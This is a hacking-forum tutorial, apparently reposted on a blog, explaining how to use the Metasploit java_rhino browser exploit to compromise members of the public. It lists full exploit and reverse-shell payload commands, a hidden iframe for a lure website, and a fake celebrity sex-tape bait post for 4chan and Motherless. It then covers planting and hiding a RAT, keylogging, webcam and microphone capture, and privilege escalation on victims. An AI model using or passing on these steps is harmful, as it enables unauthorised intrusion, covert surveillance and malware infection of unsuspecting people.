[TUT] Java Rhino Exploit Tutorial

Introduction

Ok, The Java-Drive-Bye is dead, simple, its an ineffective way to spread your RATs/Loggers etc but alot of you still insist on cluttering this forum up trying to get java drive byes to work. Im writing this tutorial because there is a better solution, the Java_Rhino exploit. The Java_Rhino exploit is a cross platform, cross browser zero day vulnerability that can be used to exploit remote machines. This tutorial will teach you how to set up the Java Rhino exploit and some of the cool things you can do with the meterpreter payload once your targets have been exploited.

What You Need Before Your Start

A hosting account from x10hosting (Free Website Host) -> http://x10hosting.com/
Download and install metasploit -> http://metasploit.com/
You need to know your public IP address -> http://www.whatsmyip.org/
If you have a router youll need to portforward port 1337 and port 4444 to your local machine.

Metasploit
Ok alot of you were having issues with metasploit, you need to install metasploit then run ./msfupdate.exe to update the exploit database to include the java rhino exploit. Then open msfconsole and run “reload_all” for for the java rhino exploit to become available.

What You Need To Understand

In this tutorial you will set up a small webserver on your local machine on port 1337 that when connected too will launch a malicious Java applet invisibly and exploit the slave. Upon exploitation the slave will connect back to your machine on port 4444 giving you access to the entire machine with the priveledges of the user that has been exploited. This will not work if your behind a router and have not forwarded these port to your local machine, if you havent done this yet stop reading, forward your ports (or connect directly to the internet) and open these ports on your firewall (if your using windows).

Initial Set Up

Ok, to keep this attack invisible i suggest making a mirror site and hosting it on the x10hosting webhosting account you set up in the “What You Need” section of this tutorial, what the website has on it i don’t really give a shit. I’ve been using a facebook knockoff site boasting a Selena Gomez Sex Tape, porn style sites work well for easy victims as i will explain later. So go and set up a site on your x10hosting account, note down your domain name and come back but keep your CPanel open, we will be adding one more peice of code to your sites homepage.

Spoiler of my dummy website – WARNING ADULT


Metasploit Setup

Ok, now we need to set up the Java_Rhino exploit server. So fire up your metasploit console and enter the following commands.

Tell metasploit to use the java rhino exploit

use exploit/multi/browser/java_rhino

Set metasploit to run the server on port on 1337

set SRVPORT 1337


Set the URL of the page that will be doing the exploiting to something more memorably

set URIPATH exploit


Use a reverse TCP meterpreter payload so we can have fun with the slave

Code:
set PAYLOAD java/meterpreter/reverse_tcp


Set the connect back payload to connect back to your public IP

Code:
set LHOST {PUT YOUR PUBLIC IP HERE}


Now run the configuration

Code:
exploit


Here is a sample output of what you should see

Code:
msf > use exploit/multi/browser/java_rhino
msf  exploit(java_rhino) > set SRVPORT 1337
SRVPORT => 1337
msf  exploit(java_rhino) > set URIPATH exploit
URIPATH => exploit
msf  exploit(java_rhino) > set PAYLOAD java/meterpreter/reverse_tcp
PAYLOAD => java/meterpreter/reverse_tcp
msf  exploit(java_rhino) > set LHOST XXX.XXX.XXX.XXX
LHOST => XXX.XXX.XXX.XXX
msf  exploit(java_rhino) > exploit
[*] Exploit running as background job.

[-] Handler failed to bind to XXX.XXX.XXX.XXX:4444
[*] Started reverse handler on 0.0.0.0:4444
[*] Using URL: http://0.0.0.0:1337/exploit
[*]  Local IP: http://192.168.2.2:1337/exploit
[*] Server started.
msf  exploit(java_rhino) >


Ok now your exploit server is listening on port 1337. You just need to get people to connect to it. So edit this following peice of code and put your public IP address in it:

Code:
<iframe src="http://[YOURIPHERE]/exploit" width=0 height=0 border=0 size=0></iframe>


So you should end up with something like this:

Code:
<iframe src="http://123.123.123.123:1337/exploit" width=0 height=0 border=0 size=0></iframe>


Copy this into the HTML on the dummy website you created on your x10hosting account. So now when ever someone views your dummy website, the iframe will force their browser to invisibly connect to your exploit server and metasploit will run the Java_Rhino exploit against their browser. Brilliant.

Getting The Clicks

Ok this is where you need to do the leg work and why i recommeneded using an adult themed dummy website inorder to get clicks.

My two personal favrouties that i love to farm with the Java_Rhino exploit are 4chan.org and Motherless.com

Go to those sites and in the Motherless boards post a picture of a hot chick and then post some comment about a sexy video on your dummy website and post the link for them to click on. This will get you about 30 minuites of traffic before its either removed or pushed to the bottom of the boards.

Do the same with the 4Chan.org adult section, you can copy and paste the post you used on Motherless.com but make sure you upload a picture too to catch peoples attention. Make the post short and to the point so the user reads it and clicks the link. I have been using this:

Code:
"Finally someone has found a Selena Gomez sex tape - this is the sexiest thing i have ever seen! -> http://link to my dummy site.com"


Along with one of those photoshopped pictures of a naked selena gomez that google just loves to turn up. In doing this you will get about 1 hours worth of traffic at about 10 clicks a minuite, which is enough for what were doing. Remember for every person that clicks through their browser will be exploited because of the iframe we put on the dummy website. You can test it yourself and visit your dummy website, metasploit should give you some output like this:

Code:
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from XXX.XXX.XXX.XXX:42045...
[*] Sending Applet.jar to XXX.XXX.XXX.XXX:42048...


Brilliant, now you need to watch the clicks come rolling in from 4Chan and Motherless from all those porn hungry weirdos. Your screen will fill up with connection attempts quickly and will look like this:

Code:
[*] Sending Applet.jar to 98.20.58.180:50224...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 74.36.201.221:61587...
[*] Sending Applet.jar to 98.20.58.180:50224...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 98.20.58.180:50240...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 98.20.58.180:50241...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 98.20.58.180:50242...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 98.20.58.180:50243...
[*] Sending Applet.jar to 74.36.201.221:61621...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 190.212.80.224:45560...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 190.212.80.224:45560...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 74.36.201.221:61587...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 74.36.201.221:61635...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 69.114.123.235:1200...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 77.224.112.18:3785...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 124.182.236.181:62576...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 80.26.163.72:52602...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 80.26.163.72:52602...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 80.141.166.139:51625...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 92.12.201.206:11063...
[*] Sending Applet.jar to 92.12.201.206:11071...
[*] Sending Applet.jar to 92.12.201.206:11071...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 92.12.201.206:11072...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 92.12.201.206:11073...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 92.12.201.206:11074...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 92.12.201.206:11075...


If your not getting connections like this but when you go to your dummy site you get a connection means noone is clicking your link, so you should go back to the boards and post some new more tempting ones. I have also seen people hack sites and put their iframes to a no-ip to get days worth of legitmate traffic into their java rhino exploit, this is just a quick overview but the more places you post/spam your dummy site link the better results youll have. I posted this on a few forums last night and collected over 100 sessions in 2 hours. Dont be disapointed if you only get a few sessions on your first try, its like fishing, you have to find the rigt bait line that works for you.

Leave this running for about 5-10 minuties to get your first sessions, Your looking for lines that look like this:

Code:
[*] Sending stage (28469 bytes) to 80.176.86.190
[*] Meterpreter session 1 opened (192.168.2.2:4444 -> 80.176.86.190:56358) at Sat Dec 24 16:56:17 +0000 2011


This means a session has been created between you and the slave, you can view all the sessions that have been created by issuing the “sessions” command:

Code:
Active sessions
==

  Id  Type  Information    Connection
  --  ----  --    --
  1   meterpreter java/java  akoltowski @ ACLAPTOP  192.168.2.2:4444 -> 80.176.86.190:56358
  2   meterpreter java/java  akoltowski @ ACLAPTOP  192.168.2.2:4444 -> 80.176.86.190:56420


To connect to one of these sessions use the “sessions -i <id>” command – the following example shows my connecting to session number 1:

Code:
sessions -i 1
[*] Starting interaction with 1...

meterpreter >


Using Your Sessions

A meterpreter session gives you alot of control over the remote slave. You can snapshot their webcam, spawn a shell, screen shot their computer, log their keystrokes. Here is a full list of all the meterpreter commands you can use to fuck with your slave. You can get this by issuing the “Help” command.

Code:
Core Commands
==

    Command  Description
    --  --
    ?  Help menu
    background    Backgrounds the current session
    bgkill    Kills a background meterpreter script
    bglist    Lists running background scripts
    bgrun  Executes a meterpreter script as a background thread
    channel  Displays information about active channels
    close  Closes a channel
    detach    Detach the meterpreter session (for http/https)
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit    Terminate the meterpreter session
    help    Help menu
    info    Displays information about a Post module
    interact    Interacts with a channel
    irb  Drop into irb scripting mode
    load    Load one or more meterpreter extensions
    migrate  Migrate the server to another process
    quit    Terminate the meterpreter session
    read    Reads data from a channel
    resource    Run the commands stored in a file
    run  Executes a meterpreter script or Post module
    use  Deprecated alias for 'load'
    write  Writes data to a channel

Stdapi: File system Commands
==

    Command  Description
    --  --
    cat  Read the contents of a file to the screen
    cd    Change directory
    del  Delete the specified file
    download  Download a file or directory
    edit    Edit a file
    getlwd  Print local working directory
    getwd  Print working directory
    lcd  Change local working directory
    lpwd    Print local working directory
    ls    List files
    mkdir  Make directory
    pwd  Print working directory
    rm    Delete the specified file
    rmdir  Remove directory
    search  Search for files
    upload  Upload a file or directory

Stdapi: Networking Commands
==

    Command  Description
    --  --
    ipconfig  Display interfaces
    portfwd  Forward a local port to a remote service
    route  View and modify the routing table

Stdapi: System Commands
==

    Command  Description
    --  --
    clearev  Clear the event log
    drop_token    Relinquishes any active impersonation token.
    execute  Execute a command
    getpid  Get the current process identifier
    getprivs  Attempt to enable all privileges available to the current process
    getuid  Get the user that the server is running as
    kill    Terminate a process
    ps    List running processes
    reboot  Reboots the remote computer
    reg  Modify and interact with the remote registry
    rev2self  Calls RevertToSelf() on the remote machine
    shell  Drop into a system command shell
    shutdown  Shuts down the remote computer
    steal_token   Attempts to steal an impersonation token from the target process
    sysinfo  Gets information about the remote system, such as OS

Stdapi: User interface Commands
==

    Command  Description
    --  --
    enumdesktops   List all accessible desktops and window stations
    getdesktop  Get the current meterpreter desktop
    idletime  Returns the number of seconds the remote user has been idle
    keyscan_dump   Dump the keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    screenshot  Grab a screenshot of the interactive desktop
    setdesktop  Change the meterpreters current desktop
    uictl    Control some of the user interface components

Stdapi: Webcam Commands
==

    Command  Description
    --  --
    record_mic    Record audio from the default microphone for X seconds
    webcam_list   List webcams
    webcam_snap   Take a snapshot from the specified webcam


I know alot of you are big into RATing and Botnets. So heres how to upload and execute your server .exe to the remote host.

First place your server.exe in the same directory as the msfconsole. You can find this directory at anytime by issuing the “lpwd” command from inside your meterpreter sessions.

Next change directory on your slave to C:Temp by issueing the CD command:

Code:
cd C:Temp


By changing directory to the C:Temp (sometimes lowercase C:temp) directory ensures we will have the right priveldges to upload and execute our server.exe.

Now upload your server.exe:

Code:
upload server.exe


You will get an output that looks like this:

Code:
meterpreter > upload server.exe
[*] uploading  : server.exe -> server.exe
[*] uploaded   : server.exe -> server.exe


Now your server.exe is on the remote host you can check it is there by issuing the “ls” command – some AV’s might delete it so its worth checking:

Code:
Listing: C:Temp
==

Mode    Size  Type  Last modified  Name
----    ----  ----  --  ----
.. output ommited
100776/rwxrwxrw-  0  fil   Sat Nov 19 10:50:28 +0000 2011  1D4F.tmp
100776/rwxrwxrw-  0  fil   Tue Nov 22 19:22:00 +0000 2011  24C0.tmp
40776/rwxrwxrw-   0  dir   Mon Dec 12 14:18:57 +0000 2011  msohtml1
40776/rwxrwxrw-   0  dir   Fri Dec 09 14:39:27 +0000 2011  msohtml
40776/rwxrwxrw-   0  dir   Sat Dec 24 16:58:53 +0000 2011  mozilla-media-cache
40776/rwxrwxrw-   0  dir   Thu Nov 03 18:23:32 +0000 2011  ia64
40776/rwxrwxrw-   0  dir   Thu Nov 03 18:23:32 +0000 2011  server.exe << -- WIN
40776/rwxrwxrw-   0  dir   Thu Nov 03 18:23:32 +0000 2011  i386
40776/rwxrwxrw-   0  dir   Sat Dec 24 17:00:11 +0000 2011  hsperfdata_akoltowski
40776/rwxrwxrw-   0  dir   Sat Dec 24 12:30:20 +0000 2011  WPDNSE
40776/rwxrwxrw-   0  dir   Thu Dec 08 16:05:02 +0000 2011  VBE
..output omitted


If it isn’t in /Temp then try uploading it the the users documents folder instead, because each user can write and execute to their home directory.

You can now execute your server.exe by issuing:

Continued on next post


Code:
execute -f server.exe -m -H


The flags will execute it from memory and hide the process from the slave.

You can then issue the “screenshot” command to screenshot the users computer to see if their AV detected it:

Code:
meterpreter > screenshot
Screenshot saved to: /home/solaris/hFOnwohk.jpeg


Meterpreter will open the screenshot in a webbrowser for you to view, as you can see my slave is watching some sleezy porn video:

Screenshot:

Spoiler
[Image: h_FOnwohk.jpg]


As you can see their AV has detected the execution so out server is now installed on the remote user, congratulations.

Other Fun Things

To get a CMD Shell (usefull)

Code:
meterpreter > cd C:WindowsSystem32
meterpreter > execute -f cmd.exe -i -H


Log Keystrokes

Code:
meterpreter > keyscan_start

(wait 10 mins)

meterpreter > keyscan_dump
meterpreter > keyscan_stop


Record Microphone

Code:
meterpreter > record_mic
[*] Starting...
[*] Stopped
Audio saved to: /home/solaris/aabHbPGz.wav


Shutdown The slave

Code:
meterpreter > Shutdown


Show the victims webcams

Code:
meterpreter > webcam_list


Photo victims webcam

Code:
meterpreter > webcam_snap <webcam id>


Get remote system info

Code:
meterpreter > sysinfo


Go back and select another session without killing this one

Code:
meterpreter > background
meterpreter > sessions
meterpreter > sessions -i <id>


Errors You Will Get

The exploit isn’t perfect, you will get errors on certain sessions, here is a common one:

Code:
[-] Operation failed: 1


You’ll get this when issuing a command that is either wrong, unable to execute on the OS or you dont have the privs for it. The only way i have found to get round this on some hosts is to change to the C:Temp directory, try again, if that doesn’t work issue:

Code:
meterpreter > getprivs
meterpreter > ps

(will give you an output of the running processes on the machine, copy the id for the srvhosts.exe process)

meterpreter > merge <the id you just copied>


This will merge the meterpreter process with srvhosts.exe which runs with admin privs so should increase your priveledge level, it works about 20% of the time.

1 Comment
  1. Reply
    Anon Nimi November 4, 2013 at 2:07 am

    WoowWWWW…….
    Hats Off to you piyush bhalala..!!!

    Excellent work… I was searching for such a tutorial for more than 3 weeks and was frustated of many sleepless nights…

    Thank you sooo Much for your wonderful work.!!

Leave a reply